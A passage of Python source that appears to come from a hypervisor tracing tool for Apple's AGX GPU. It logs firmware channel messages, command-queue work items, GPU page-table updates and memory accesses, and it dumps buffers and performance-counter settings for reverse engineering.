        self.tracer.log(f"[{self.index}:{self.name}] {msg}")

    def poll(self):
        for i in range(self.ring_count):
            self.poll_ring(i)

    def poll_ring(self, ring, tail=None):
        msgcls, size, count = self.channel.ring_defs[ring]

        cur = self.state.tail[ring]
        if tail is None:
            tail = self.channel.state[ring].WRITE_PTR.val
        if tail >= count:
            raise Exception(f"Message index {tail:#x} >= {count:#x}")
        if cur != tail:
            #self.log(f"{cur:#x} -> {tail:#x}")
            while cur != tail:
                msg = self.channel.get_message(ring, cur, self.tracer.meta_gpuvm)
                self.log(f"Message @{ring}.{cur}:\n{msg!s}")
                self.tracer.handle_ringmsg(msg)
                #if self.index < 12:
                    #self.hv.run_shell()
                cur = (cur + 1) % count
            self.state.tail[ring] = cur

    def set_active(self, active=True):
        if active:
            if not self.state.active:
                for ring in range(self.ring_count):
                    self.state.tail[ring] = self.channel.state[ring].WRITE_PTR.val

            for base in range(0, 0x30 * self.ring_count, 0x30):
                p = self.uat.iotranslate(0, self.channel.state_addr + base + self.RPTR, 4)[0][0]
                self.hv.add_tracer(irange(p, 4),
                                   f"ChannelTracer/{self.name}",
                                   mode=TraceMode.SYNC,
                                   read=self.state_read,
                                   write=self.state_write,
                                   off=base + self.RPTR)
                p = self.uat.iotranslate(0, self.channel.state_addr + base + self.WPTR, 4)[0][0]
                self.hv.add_tracer(irange(p, 4),
                                   f"ChannelTracer/{self.name}",
                                   mode=TraceMode.SYNC,
                                   read=self.state_read,
                                   write=self.state_write,
                                   off=base + self.WPTR)
        else:
            self.hv.clear_tracers(f"ChannelTracer/{self.name}")
        self.state.active = active

ChannelTracer = ChannelTracer._reloadcls()
CommandQueueInfo = CommandQueueInfo._reloadcls()

class FWCtlChannelTracer(ChannelTracer):
    STATE_FIELDS = FWControlStateFields
    WPTR = 0x10
    RPTR = 0x00

class CommandQueueTracer(Reloadable):
    def __init__(self, tracer, info_addr, new_queue, queue_type):
        self.tracer = tracer
        self.uat = tracer.uat
        self.hv = tracer.hv
        self.u = self.hv.u
        self.verbose = False
        self.info_addr = info_addr
        self.dumpfile = None
        self.queue_type = queue_type

        if info_addr not in tracer.state.queues:
            self.state = CommandQueueState()
            self.state.last_uuid = None
            self.state.rptr = None
            self.state.active = True
            tracer.state.queues[info_addr] = self.state
        else:
            self.state = tracer.state.queues[info_addr]

        self.tracer.uat.invalidate_cache()
        self.update_info()

        if new_queue:
            if getattr(self.state, "last_uuid", None) is None:
                self.state.last_uuid = None

            if self.info.uuid == self.state.last_uuid:
                return

            self.state.last_uuid = self.info.uuid
            self.state.rptr = 0

            if tracer.cmd_dump_dir:
                qtype = ["TA", "3D", "CP"][queue_type]
                fname = f"{datetime.datetime.now().isoformat()}-{tracer.state.queue_seq:04d}-{qtype}.json"
                self.dumpfile = open(os.path.join(tracer.cmd_dump_dir, fname), "w")
                json.dump({
                    "compatible": tracer.dev_sgx.compatible,
                    "chip_id": tracer.chip_id,
                    "version": Ver._version,
                    "type": qtype,
                }, self.dumpfile)
                self.dumpfile.write("\n")
                self.dumpfile.flush()
                tracer.state.queue_seq += 1


    def update_info(self):
        self.info = CommandQueueInfo.parse_stream(self.tracer.get_stream(0, self.info_addr))

    def log(self, msg):
        self.tracer.log(f"[CQ@{self.info_addr:#x}] {msg}")

    @property
    def rb_size(self):
        return self.info.pointers.rb_size

    def json_default(self, val):
        return None

    def get_workitems(self, workmsg):
        self.tracer.uat.invalidate_cache()
        self.update_info()

        if self.state.rptr is None:
            self.state.rptr = int(self.info.pointers.gpu_doneptr)
            self.log(f"Initializing rptr to {self.info.gpu_rptr1:#x}")

        self.log(f"Got workmsg: wptr={workmsg.head:#x} rptr={self.state.rptr:#x}")
        self.log(f"Queue info: {self.info}")


        assert self.state.rptr < self.rb_size
        assert workmsg.head < self.rb_size

        stream = self.tracer.get_stream(0, self.info.rb_addr)

        count = 0
        orig_rptr = rptr = self.state.rptr
        while rptr != workmsg.head:
            count += 1
            stream.seek(self.info.rb_addr + rptr * 8, 0)
            pointer = Int64ul.parse_stream(stream)
            self.log(f"WI item @{rptr:#x}: {pointer:#x}")
            if pointer:
                stream.seek(pointer, 0)
                wi = CmdBufWork.parse_stream(stream)
                if self.dumpfile:
                    json.dump(wi, self.dumpfile, default=self.json_default)
                    self.dumpfile.write("\n")
                    self.dumpfile.flush()
                yield wi
            rptr = (rptr + 1) % self.rb_size

        self.state.rptr = rptr

        self.log(f"Parsed {count} items from {orig_rptr:#x} to {workmsg.head:#x}")

    def set_active(self, active=True):
        if not active:
            self.state.rptr = None
        self.state.active = active

CmdBufWork = CmdBufWork._reloadcls()
CommandQueueTracer = CommandQueueTracer._reloadcls()
InitData = InitData._reloadcls(True)
HelperArg = HelperArg._reloadcls()

class HandoffTracer(Tracer):
    DEFAULT_MODE = TraceMode.SYNC

    def __init__(self, hv, agx_tracer, base, verbose=False):
        super().__init__(hv, verbose=verbose)
        self.agx_tracer = agx_tracer
        self.base = base

    def start(self):
        self.trace_regmap(self.base, 0x4000, GFXHandoffStruct, name="regs")

class SGXTracer(ADTDevTracer):
    DEFAULT_MODE = TraceMode.HOOK

    REGMAPS = [SGXRegs, SGXInfoRegs]
    NAMES = ["sgx", "sgx-id"]

    def __init__(self, hv, devpath, verbose=False):
        super().__init__(hv, devpath, verbose=verbose)
        self.hooks = {}

    def hook_r(self, addr, width, **kwargs):
        self.log(f"HOOK: {addr:#x}:{width}")

        if addr in self.hooks:
            val = self.hooks[addr]
            self.log(f"  Returning: {val:#x}")
        else:
            xval = val = super().hook_r(addr, width, **kwargs)
            if isinstance(val, (list, tuple)):
                xval = list(map(hex, val))
            else:
                xval = hex(val)
            self.log(f"  Read: {xval}")

        return val

    def hook_w(self, addr, val, width, **kwargs):
        if isinstance(val, (list, tuple)):
            xval = list(map(hex, val))
        else:
            xval = hex(val)

        self.log(f"HOOK: {addr:#x}:{width} = {xval}")

        super().hook_w(addr, val, width, **kwargs)

class AGXTracer(ASCTracer):
    ENDPOINTS = {
        0x20: PongEp,
        0x21: KickEp
    }

    REGMAPS = [ASCRegs]
    NAMES = ["asc"]

    PAGESIZE = 0x4000

    def __init__(self, hv, devpath, verbose=False):
        super().__init__(hv, devpath, verbose)
        self.channels = []
        self.uat = UAT(hv.iface, hv.u, hv)
        self.mon = RegMonitor(hv.u, ascii=True, log=hv.log)
        self.chip_id = hv.u.adt["/chosen"].chip_id
        self.dev_sgx = hv.u.adt["/arm-io/sgx"]
        self.sgx = SGXRegs(hv.u, self.dev_sgx.get_reg(0)[0])
        self.gpu_region = getattr(self.dev_sgx, "gpu-region-base")
        self.gpu_region_size = getattr(self.dev_sgx, "gpu-region-size")
        self.gfx_shared_region = getattr(self.dev_sgx, "gfx-shared-region-base")
        self.gfx_shared_region_size = getattr(self.dev_sgx, "gfx-shared-region-size")
        self.gfx_handoff = getattr(self.dev_sgx, "gfx-handoff-base")
        self.gfx_handoff_size = getattr(self.dev_sgx, "gfx-handoff-size")

        self.handoff_tracer = HandoffTracer(hv, self, self.gfx_handoff, verbose=2)

        self.ignorelist = []
        self.last_msg = None

        # self.mon.add(self.gpu_region, self.gpu_region_size, "contexts")
        # self.mon.add(self.gfx_shared_region, self.gfx_shared_region_size, "gfx-shared")
        # self.mon.add(self.gfx_handoff, self.gfx_handoff_size, "gfx-handoff")

        self.trace_kernva = False
        self.trace_userva = False
        self.trace_kernmap = True
        self.trace_usermap = True
        self.pause_after_init = False
        self.shell_after_init = False
        self.after_init_hook = None
        self.encoder_id_filter = None
        self.exclude_context_id = None
        self.redump = False
        self.skip_asc_tracing = True
        self.cmd_dump_dir = None
        self.buffer_mgr_map = {}

        self.vmcnt = 0
        self.readlog = {}
        self.writelog = {}
        self.cmdqueues = {}
        self.va_to_pa = {}

        self.last_ta = None
        self.last_3d = None
        self.last_cp = None

        self.agxdecode = None

        libagxdecode = os.getenv("AGXDECODE", None)
        if libagxdecode:
            self.init_agxdecode(libagxdecode)

        self.counters = {}
        counters = os.getenv("COUNTERS", None)
        if counters:
            pl = plistlib.load(open(counters,"rb"))
            for ctr in pl["DeviceCounters"]:
                spec = pl[ctr]
                spec["Name"] = ctr
                self.counters[(spec['Partition'], spec['Select'])] = spec
            self.log(f"Loaded {len(self.counters)} performance counters")

    def init_agxdecode(self, path):
        # Hack to make sure we reload the lib when it changes
        # tpath = os.getenv("XDG_RUNTIME_DIR", "/tmp") + "/" + str(time.time()) + ".so"
        # os.symlink(path, tpath)
        # lib = ctypes.cdll.LoadLibrary(tpath)
        lib = ctypes.cdll.LoadLibrary(path)

        self.agxdecode = lib

        read_gpu_mem = ctypes.CFUNCTYPE(ctypes.c_size_t, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_void_p)
        stream_write = ctypes.CFUNCTYPE(ctypes.c_ssize_t, ctypes.POINTER(ctypes.c_char), ctypes.c_size_t)

        class libagxdecode_config(ctypes.Structure):
            _fields_ = [
                ("chip_id", ctypes.c_uint32),
                ("read_gpu_mem", read_gpu_mem),
                ("stream_write", stream_write),
            ]

        def _read_gpu_mem(addr, size, data):
            if addr < 0x100000000:
                addr |= 0x1100000000
            buf = self.read_func(addr, size)
            ctypes.memmove(data, buf, len(buf))
            return len(buf)

        def _stream_write(buf, size):
            self.log(buf[:size].decode("ascii"))
            return size

        # Keep refs
        self._read_gpu_mem = read_gpu_mem(_read_gpu_mem)
        self._stream_write = stream_write(_stream_write)

        config = libagxdecode_config(self.chip_id, self._read_gpu_mem, self._stream_write)

        self.agxdecode.libagxdecode_init(ctypes.pointer(config))

        self.agxdecode.libagxdecode_vdm.argtypes = [ctypes.c_uint64, ctypes.c_char_p, ctypes.c_bool]
        self.agxdecode.libagxdecode_cdm.argtypes = [ctypes.c_uint64, ctypes.c_char_p, ctypes.c_bool]
        self.agxdecode.libagxdecode_usc.argtypes = [ctypes.c_uint64, ctypes.c_char_p, ctypes.c_bool]

    def get_cmdqueue(self, info_addr, new_queue, queue_type):
        if info_addr in self.cmdqueues and not new_queue:
            return self.cmdqueues[info_addr]

        cmdqueue = CommandQueueTracer(self, info_addr, new_queue, queue_type)
        self.cmdqueues[info_addr] = cmdqueue

        return cmdqueue

    def clear_ttbr_tracers(self):
        self.hv.clear_tracers(f"UATTTBRTracer")

    def add_ttbr_tracers(self):
        self.hv.add_tracer(irange(self.gpu_region, UAT.NUM_CONTEXTS * 16),
                        f"UATTTBRTracer",
                        mode=TraceMode.WSYNC,
                        write=self.uat_write,
                        iova=0,
                        base=self.gpu_region,
                        level=3)

    def clear_uatmap_tracers(self, ctx=None):
        if ctx is None:
            for i in range(UAT.NUM_CONTEXTS):
                self.clear_uatmap_tracers(i)
        else:
            self.hv.clear_tracers(f"UATMapTracer/{ctx}")

    def add_uatmap_tracers(self, ctx=None):
        self.log(f"add_uatmap_tracers({ctx})")
        if ctx is None:
            if self.trace_kernmap:
                self.add_uatmap_tracers(0)
            if self.trace_usermap:
                for i in range(1, UAT.NUM_CONTEXTS):
                    self.add_uatmap_tracers(i)
            return

        if ctx != 0 and not self.trace_usermap:
            return
        if ctx == 0 and not self.trace_kernmap:
            return

        def trace_pt(start, end, idx, pte, level, sparse):
            if start >= 0xf8000000000 and (ctx != 0 or not self.trace_kernmap):
                return
            if start < 0xf8000000000 and not self.trace_usermap:
                return
            self.log(f"Add UATMapTracer/{ctx} {start:#x}")
            self.hv.add_tracer(irange(pte.offset(), 0x4000),
                            f"UATMapTracer/{ctx}",
                            mode=TraceMode.WSYNC,
                            write=self.uat_write,
                            iova=start,
                            base=pte.offset(),
                            level=2 - level,
                            ctx=ctx)

        self.uat.foreach_table(ctx, trace_pt)

    def clear_gpuvm_tracers(self, ctx=None):
        self.uat.invalidate_cache()
        if ctx is None:
            for i in range(UAT.NUM_CONTEXTS):
                self.clear_gpuvm_tracers(i)
        else:
            self.hv.clear_tracers(f"GPUVM/{ctx}")

    def add_gpuvm_tracers(self, ctx=None):
        self.log(f"add_gpuvm_tracers({ctx})")
        if ctx is None:
            self.add_gpuvm_tracers(0)
            if self.trace_userva:
                for i in range(1, UAT.NUM_CONTEXTS):
                    self.add_gpuvm_tracers(i)
            return

        def trace_page(start, end, idx, pte, level, sparse):
            self.uat_page_mapped(start, pte, ctx)

        self.uat.foreach_page(ctx, trace_page)

    def uat_write(self, evt, level=3, base=0, iova=0, ctx=None):
        off = (evt.addr - base) // 8
        sh = ["NS", "??", "OS", "IS"]
        a = f"{evt.flags.ATTR:02x}:{sh[evt.flags.SH]}"
        self.log(f"UAT <{a}> write L{level} at {ctx}:{iova:#x} (#{off:#x}) -> {evt.data}")

        if level == 3:
            ctx = off // 2
            is_kernel = off & 1
            if ctx != 0 and is_kernel:
                return

            if is_kernel:
                iova += 0xf8000000000
            pte = TTBR(evt.data)
            if not pte.valid():
                self.log(f"Context {ctx} invalidated")
                self.uat.invalidate_cache()
                self.clear_uatmap_tracers(ctx)
                self.clear_gpuvm_tracers(ctx)
                return
            self.log(f"Dumping UAT for context {ctx}")
            self.uat.invalidate_cache()
            _, pt = self.uat.get_pt(self.uat.gpu_region + ctx * 16, 2)
            pt[off & 1] = evt.data
            self.uat.dump(ctx, log=self.log)
            self.add_uatmap_tracers(ctx)
            self.add_gpuvm_tracers(ctx)
        else:
            self.uat.invalidate_cache()
            is_kernel = iova >= 0xf8000000000
            iova += off << (level * 11 + 14)
            if level == 0:
                pte = Page_PTE(evt.data)
                self.uat_page_mapped(iova, pte, ctx)
                return
            else:
                pte = PTE(evt.data)

        if not pte.valid():
            try:
                paddr = self.va_to_pa[(ctx, level, iova)]
            except KeyError:
                return
            self.hv.del_tracer(irange(paddr, 0x4000),
                               f"UATMapTracer/{ctx}")
            del self.va_to_pa[(ctx, level, iova)]
            return

        if ctx != 0 and not self.trace_usermap:
            return
        if ctx == 0 and not self.trace_kernmap:
            return

        self.va_to_pa[(ctx, level, iova)] = pte.offset()
        level -= 1
        self.hv.add_tracer(irange(pte.offset(), 0x4000),
                           f"UATMapTracer/{ctx}",
                           mode=TraceMode.WSYNC,
                           write=self.uat_write,
                           iova=iova,
                           base=pte.offset(),
                           level=level,
                           ctx=ctx)

    def uat_page_mapped(self, iova, pte, ctx=0):
        if iova >= 0xf8000000000 and ctx != 0:
            return
        if not pte.valid():
            self.log(f"UAT unmap {ctx}:{iova:#x} ({pte})")
            try:
                paddr = self.va_to_pa[(ctx, iova)]
            except KeyError:
                return
            self.hv.del_tracer(irange(paddr, 0x4000), f"GPUVM/{ctx}")
            del self.va_to_pa[(ctx, iova)]
            return

        paddr = pte.offset()
        self.log(f"UAT map {ctx}:{iova:#x} -> {paddr:#x} ({pte})")
        if paddr < 0x800000000:
            return # MMIO, ignore

        if not self.trace_userva and ctx != 0 and iova < 0x80_00000000:
            return
        if not self.trace_kernva and ctx == 0:
            return

        self.va_to_pa[(ctx, iova)] = paddr
        self.hv.add_tracer(irange(paddr, 0x4000),
                           f"GPUVM/{ctx}",
                           mode=TraceMode.ASYNC,
                           read=self.event_gpuvm,
                           write=self.event_gpuvm,
                           iova=iova,
                           paddr=paddr,
                           ctx=ctx)

        if ctx == 0:
            self.clear_stats_tracers()

    def event_gpuvm(self, evt, iova, paddr, name=None, base=None, ctx=None):
        off = evt.addr - paddr
        iova += off

        if evt.flags.WRITE:
            self.writelog[iova] = (self.vmcnt, evt)
        else:
            self.readlog[iova] = (self.vmcnt, evt)
        t = "W" if evt.flags.WRITE else "R"
        m = "+" if evt.flags.MULTI else " "
        sh = ["NS", "??", "OS", "IS"]
        a = f"{evt.flags.ATTR:02x}:{sh[evt.flags.SH]}"
        dinfo = ""
        if name is not None and base is not None:
            dinfo = f"[{name} + {iova - base:#x}]"
        logline = (f"[cpu{evt.flags.CPU}] GPUVM[{ctx}/{self.vmcnt:5}]: <{a}>{t}.{1<<evt.flags.WIDTH:<2}{m} " +
                   f"{iova:#x}({evt.addr:#x}){dinfo} = {evt.data:#x}")
        self.log(logline, show_cpu=False)
        self.vmcnt += 1
        #self.mon.poll()

    def meta_gpuvm(self, ctx, iova, size=None):
        if size is None:
            pte = self.uat.ioperm(ctx, iova)
            return f"PTE: {pte.describe()}"

        meta = ""
        iova &= 0xfffffffffff
        for off in range(size):
            offva = iova + off
            if offva in self.readlog:
                ctr, evt = self.readlog[offva]
                m = "+" if evt.flags.MULTI else " "
                meta += f"[R.{1<<evt.flags.WIDTH:<2}{m} @{ctr} +{off:#x}]"

            if offva in self.writelog:
                ctr, evt = self.writelog[offva]
                m = "+" if evt.flags.MULTI else " "
                meta += f"[W.{1<<evt.flags.WIDTH:<2}{m} @{ctr} +{off:#x}]"

        return meta or None

    def get_stream(self, context, off):
        stream = self.uat.iostream(context, off)
        stream.meta_fn = lambda a, b: self.meta_gpuvm(context, a, b)
        return stream

    def mitigate_exploits(self):
        def hook(addr, val, width):
            return 0 # Begone, GPU kernel mode in user contexts

        for i in range(1, 64):
            addr = self.gpu_region + i * 16 + 8
            self.hv.add_tracer(irange(addr, 8), "UATMitigation", TraceMode.HOOK, None, hook)

    def start(self):
        if self.skip_asc_tracing and getattr(self.state, "initdata", None) is not None:
            super().stop()
        else:
            super().start()

        #self.mitigate_exploits()

        self.clear_ttbr_tracers()
        self.clear_uatmap_tracers()
        self.add_ttbr_tracers()
        self.add_uatmap_tracers()
        self.clear_gpuvm_tracers()
        self.add_mon_regions()

        #self.handoff_tracer.start()
        self.init_channels()
        if self.state.active:
            self.resume()
        else:
            self.pause()

    def stop(self):
        self.pause()
        self.handoff_tracer.stop()
        self.clear_ttbr_tracers()
        self.clear_uatmap_tracers()
        self.clear_gpuvm_tracers()
        super().stop()

    def mon_addva(self, ctx, va, size, name=""):
        self.mon.add(va, size, name, readfn= lambda a, s: self.uat.ioread(ctx, a, s))

    def handle_ringmsg(self, msg):
        self.uat.invalidate_cache()
        self.mon.poll()
        if msg.__class__.__name__ == "FlagMsg":
            self.log(f"== Event flag notification ==")
            self.handle_event(msg)
            return
        elif msg.__class__.__name__ == "RunCmdQueueMsg":
            self.log(f"== Work notification (type {msg.queue_type})==")
            queue = self.get_cmdqueue(msg.cmdqueue_addr, msg.new_queue, msg.queue_type)
            work_items = list(queue.get_workitems(msg))
            if self.encoder_id_filter is not None:
                for wi in work_items:
                    if wi.cmd.magic == 0:
                        # TA
                        if not self.encoder_id_filter(wi.cmd.struct_3.encoder_id):
                            return True
                    if wi.cmd.magic == 1:
                        # 3D
                        if not self.encoder_id_filter(wi.cmd.struct_6.encoder_id):
                            return True
                    if wi.cmd.magic == 3:
                        # CP
                        if not self.encoder_id_filter(wi.cmd.encoder_params.encoder_id):
                            return True
            if self.exclude_context_id is not None:
                for wi in work_items:
                    if wi.cmd is None:
                        self.log("wi.cmd is none?")
                    if wi.cmd and wi.cmd.magic in (0, 1, 3):
                        if self.exclude_context_id == wi.cmd.context_id:
                            return True
            for wi in work_items:
                self.log(str(wi))
                if msg.queue_type == 2:
                    self.handle_compute(wi)
                    self.queue_cp = queue
                elif msg.queue_type == 1:
                    self.handle_3d(wi)
                    self.queue_3d = queue
                elif msg.queue_type == 0:
                    self.handle_ta(wi)
                    self.queue_ta = queue
        elif msg.__class__.__name__ == "GrowTVBMsg":
            addr = self.buffer_mgr_map.get(msg.bm_id, 0)
            if addr:
                info = BufferManagerInfo.parse_stream(self.get_stream(0, addr))
                self.log(f"BM info: {info}")
        elif msg.__class__.__name__ == "DC_GrowTVBAck":
            addr = self.buffer_mgr_map.get(msg.bm_id, 0)
            if addr:
                info = BufferManagerInfo.parse_stream(self.get_stream(0, addr))
                self.log(f"BM info: {info}")
        elif msg.__class__.__name__ == "DC_ConfigurePerfCounters":
            self.configure_perf_counters()
            self.state.perf_enabled = True
        elif msg.__class__.__name__ == "DC_DisablePerfCounters":
            self.state.perf_enabled = False
        return True

    def configure_perf_counters(self):
        self.log("=== Performance counter config ==")
        rc = self.state.initdata.regionC = InitData_RegionC.parse_stream(
            self.get_stream(0, self.state.initdata.regionC._addr))
        for i in range(rc.perfctr_count):
            cfg = self.state.initdata.regionC.perfctrs[i]
            tail = ""
            partition = cfg.regs & 0x7f
            if partition == 1:
                select = (cfg.en_mask << 32) | cfg.dis_mask
            else:
                select = cfg.source_mask
            spec = self.counters.get((partition, cfg.source_mask), None)
            if spec:
                tail = f" {spec['Name']} [+{spec['Increment']} {spec['Partition']}/{spec['Select']:x}/{spec.get('SourceMask', 0)}]: {spec['type']}:{spec.get('Description', None)}"
            self.log(f"#{i:3d} R={cfg.regs:016x} M={cfg.dis_mask:8x}/{cfg.en_mask:8x} S={cfg.source_mask:#10x} B={cfg.base_reg:#x} T={cfg.unk_type} C={cfg.count} idx={cfg.index}{tail}")

        self.dump_perf_counters()

    def dump_perf_counters(self):
        if not self.state.perf_enabled:
            return

        rc = self.state.initdata.regionC
        self.log(f"unk_8890 = {rc.unk_8890:#x}")
        self.log("=== Performance counter buffers ==")
        if rc.unkptr_8894 != 0:
            self.log(f"unkptr_8894 @ {rc.unkptr_8894:#x}")
            chexdump(self.uat.ioread(0, rc.unkptr_8894, rc.size_889c), print_fn=self.log)
        if rc.unkptr_88a0 != 0:
            self.log(f"unkptr_88a0 @ {rc.unkptr_88a0:#x}")
            chexdump(self.uat.ioread(0, rc.unkptr_88a0, rc.size_889c), print_fn=self.log)
        if rc.unkptr_88a8 != 0:
            self.log(f"unkptr_88a8 @ {rc.unkptr_88a8:#x}")
            chexdump(self.uat.ioread(0, rc.unkptr_88a8, rc.unkptr_88b4 - rc.unkptr_88a8), print_fn=self.log)
            self.log(f"unkptr_88b4 @ {rc.unkptr_88b4:#x}")
            chexdump(self.uat.ioread(0, rc.unkptr_88b4, 0x1000), print_fn=self.log)

    def handle_event(self, msg):
        if self.last_ta and self.redump:
            self.log("Redumping TA...")
            stream = self.get_stream(0, self.last_ta._addr)
            last_ta = CmdBufWork.parse_stream(stream)
            self.log(str(last_ta))
            self.handle_ta(last_ta)
            self.queue_ta.update_info()
            self.log(f"Queue info: {self.queue_ta.info}")
            self.last_ta = None
            self.dump_perf_counters()
            if self.state.perf_enabled:
                self.hv.run_shell()
        if self.last_3d and self.redump:
            self.log("Redumping 3D...")
            stream = self.get_stream(0, self.last_3d._addr)
            last_3d = CmdBufWork.parse_stream(stream)
            self.log(str(last_3d))
            self.handle_3d(last_3d)
            self.queue_3d.update_info()
            self.log(f"Queue info: {self.queue_3d.info}")
            self.last_3d = None
            self.dump_perf_counters()
            if self.state.perf_enabled:
                self.hv.run_shell()
        if self.last_cp and self.redump:
            self.log("Redumping CP...")
            stream = self.get_stream(0, self.last_cp._addr)
            last_cp = CmdBufWork.parse_stream(stream)
            self.log(str(last_cp))
            self.handle_compute(last_cp)
            self.queue_cp.update_info()
            self.log(f"Queue info: {self.queue_cp.info}")
            self.last_cp = None
            self.dump_perf_counters()
            if self.state.perf_enabled:
                self.hv.run_shell()

    def dump_buffer_manager(self, buffer_mgr, kread, read):
        return

        self.log(f"  buffer_mgr @ {buffer_mgr._addr:#x}: {buffer_mgr!s}")
        self.log(f"    page_list @ {buffer_mgr.page_list_addr:#x}:")
        chexdump(read(buffer_mgr.page_list_addr,
                        buffer_mgr.page_list_size), print_fn=self.log)
        self.log(f"    block_list @ {buffer_mgr.block_list_addr:#x}:")
        chexdump(read(buffer_mgr.block_list_addr,
                        0x8000), print_fn=self.log)
        #self.log(f"    unkptr_d8 @ {buffer_mgr.unkptr_d8:#x}:")
        #chexdump(read(buffer_mgr.unkptr_d8, 0x4000), print_fn=self.log)

    def read_func(self, off, size):
        data = b""
        while size > 0:
            boundary = (off + 0x4000) & ~0x3fff
            block = min(size, boundary - off)
            try:
                data += self.uat.ioread(self.cur_context, off & 0x7fff_ffff_ffff_ffff, block)
            except Exception:
                break
            off += block
            size -= block
        return data

    def handle_ta(self, wi):
        if wi.cmd is None:
            return

        self.log(f"Got TA WI{wi.cmd.magic:d}")
        self.last_ta = wi

        def kread(off, size):
            return self.uat.ioread(0, off, size)

        if wi.cmd.magic == 6:
            wi6 = wi.cmd
            #self.log(f"  unkptr_14 @ {wi6.unkptr_14:#x}:")
            #chexdump(kread(wi6.unkptr_14, 0x100), print_fn=self.log)

        elif wi.cmd.magic == 0:
            self.uat.invalidate_cache()
            wi0 = wi.cmd
            context = wi0.context_id

            read = self.read_func
            self.cur_context = context

            #chexdump(kread(wi0.addr, 0x600), print_fn=self.log)
            self.log(f"  context_id = {context:#x}")
            self.dump_buffer_manager(wi0.buffer_mgr, kread, self.read_func)
            self.buffer_mgr_map[wi0.buffer_mgr_slot] = wi0.buffer_mgr_addr
            #self.log(f"  unk_emptybuf @ {wi0.unk_emptybuf_addr:#x}:")
            #chexdump(kread(wi0.unk_emptybuf_addr, 0x1000), print_fn=self.log)

            #self.log(f"  unkptr_48 @ {wi0.unkptr_48:#x}:")
            #chexdump(read(wi0.unkptr_48, 0x1000), print_fn=self.log)
            #self.log(f"  unkptr_58 @ {wi0.unkptr_58:#x}:")
            #chexdump(read(wi0.unkptr_58, 0x4000), print_fn=self.log)
            #self.log(f"  unkptr_60 @ {wi0.unkptr_60:#x}:")
            #chexdump(read(wi0.unkptr_60, 0x4000), print_fn=self.log)

            #self.log(f"  unkptr_45c @ {wi0.unkptr_45c:#x}:")
            #chexdump(read(wi0.unkptr_45c, 0x1800), print_fn=self.log)

            for i in wi0.microsequence.value:
                i = i.cmd
                if i.__class__.__name__ == "StartTACmd":
                    self.log(f"  # StartTACmd")


                    # self.log(f"    unkptr_24 @ {i.unkptr_24:#x}:")
                    # chexdump(read(i.unkptr_24, 0x100), print_fn=self.log)
                    # self.log(f"    unk_5c @ {i.unkptr_5c:#x}:")
                    # chexdump(read(i.unkptr_5c, 0x100), print_fn=self.log)

                elif i.__class__.__name__ == "FinalizeTACmd":
                    self.log(f"  # FinalizeTACmd")


            self.log(f"    buf_thing @ {wi0.buf_thing_addr:#x}: {wi0.buf_thing!s}")
            self.log(f"      unkptr_18 @ {wi0.buf_thing.unkptr_18:#x}::")
            chexdump(read(wi0.buf_thing.unkptr_18, 0x80), print_fn=self.log)

            if getattr(wi0, "struct_2", None):
                if getattr(wi0.struct_2, "tvb_cluster_meta1", None):
                    data = read(wi0.struct_2.tvb_cluster_meta1, 0x100000)
                    self.log(f"      meta1 @ {wi0.struct_2.tvb_cluster_meta1:#x}:")
                    chexdump(data, print_fn=self.log)
                    blocks = wi0.struct_2.tvb_cluster_meta1 >> 50
                    tc = wi0.tiling_params.tile_count
                    xt = (tc & 0xfff) + 1
                    yt = ((tc >> 12) & 0xfff) + 1
                    self.log(f"      TILES {xt} {yt} {blocks}")

                    self.log(f"      meta2 @ {wi0.struct_2.tvb_cluster_meta2:#x}:")
                    data = read(wi0.struct_2.tvb_cluster_meta2, 0x100000)
                    chexdump(data, print_fn=self.log)
                    self.log(f"      meta3 @ {wi0.struct_2.tvb_cluster_meta3:#x}:")
                    data = read(wi0.struct_2.tvb_cluster_meta3, 0x100000)
                    chexdump(data, print_fn=self.log)
                    self.log(f"      meta4 @ {wi0.struct_2.tvb_cluster_meta4:#x}:")
                    data = read(wi0.struct_2.tvb_cluster_meta4, 0x100000)
                    chexdump(data, print_fn=self.log)
                    data = read(wi0.struct_2.tvb_cluster_tilemaps, 0x400000)
                    self.log(f"      cluster_tilemaps @ {wi0.struct_2.tvb_cluster_tilemaps:#x}: ({len(data):#x})")
                    chexdump(data, print_fn=self.log)
                    data = read(wi0.struct_2.tvb_tilemap, 0x100000)
                    self.log(f"      tilemaps @ {wi0.struct_2.tvb_tilemap:#x}: ({len(data):#x})")
                    chexdump(data, print_fn=self.log)

                if wi0.struct_2.helper_arg != 0:
                    data = read(wi0.struct_2.helper_arg, 0x100000)
                    self.log(f"      helper_arg @ {wi0.struct_2.helper_arg:#x}: ({len(data):#x})")
                    chexdump(data, print_fn=self.log)

                if self.agxdecode:
                    self.log("Decode VDM")
                    self.uat.invalidate_cache()
                    self.agxdecode.libagxdecode_vdm(wi0.struct_2.encoder_addr, b"VDM", True)

            regs = getattr(wi0, "registers", None)
            if regs is not None:
                for reg in regs:
                    if reg.number == 0x1c920: # meta1
                        self.log(f"      meta1 @ {reg.data:#x}:")
                        data = read(reg.data, 0x41000)
                        chexdump(data, print_fn=self.log)
                    elif reg.number == 0x1c041: # clustering tilemaps
                        self.log(f"      cl_tilemaps @ {reg.data:#x}:")
                        data = read(reg.data, 0x100000)
                        chexdump(data, print_fn=self.log)
                    elif reg.number == 0x1c039: # tilemaps
                        self.log(f"      tilemap @ {reg.data:#x}:")
                        data = read(reg.data, 0x100000)
                        chexdump(data, print_fn=self.log)
                    elif reg.number == 0x1c880:
                        if self.agxdecode:
                            self.log("Decode VDM")
                            self.uat.invalidate_cache()
                            self.agxdecode.libagxdecode_vdm(reg.data, b"VDM", True)

    def handle_3d(self, wi):
        self.log(f"Got 3D WI{wi.cmdid:d}")
        if wi.cmdid != 1:
            return

        self.last_3d = wi

        def kread(off, size):
            return self.uat.ioread(0, off, size)

        if wi.cmd.magic == 4:
            wi4 = wi.cmd
            #self.log(f" completion_buf @ {wi4.completion_buf_addr:#x}: {wi4.completion_buf!s} ")
            #chexdump(kread(wi4.completion_buf_addr, 0x1000), print_fn=self.log)
        elif wi.cmd.magic == 1:
            self.uat.invalidate_cache()
            wi1 = wi.cmd
            context = wi1.context_id
            self.cur_context = context
            read = self.read_func

            self.log(f" context_id = {context:#x}")
            for i in wi1.microsequence.value:
                i = i.cmd
                if i.__class__.__name__ == "Start3DCmd":
                    cmd3d = i
                    self.log(f" 3D:")
                    #self.log(f"  struct1 @ {cmd3d.struct1_addr:#x}: {cmd3d.struct1!s}")
                    #self.log(f"  struct2 @ {cmd3d.struct2_addr:#x}: {cmd3d.struct2!s}")
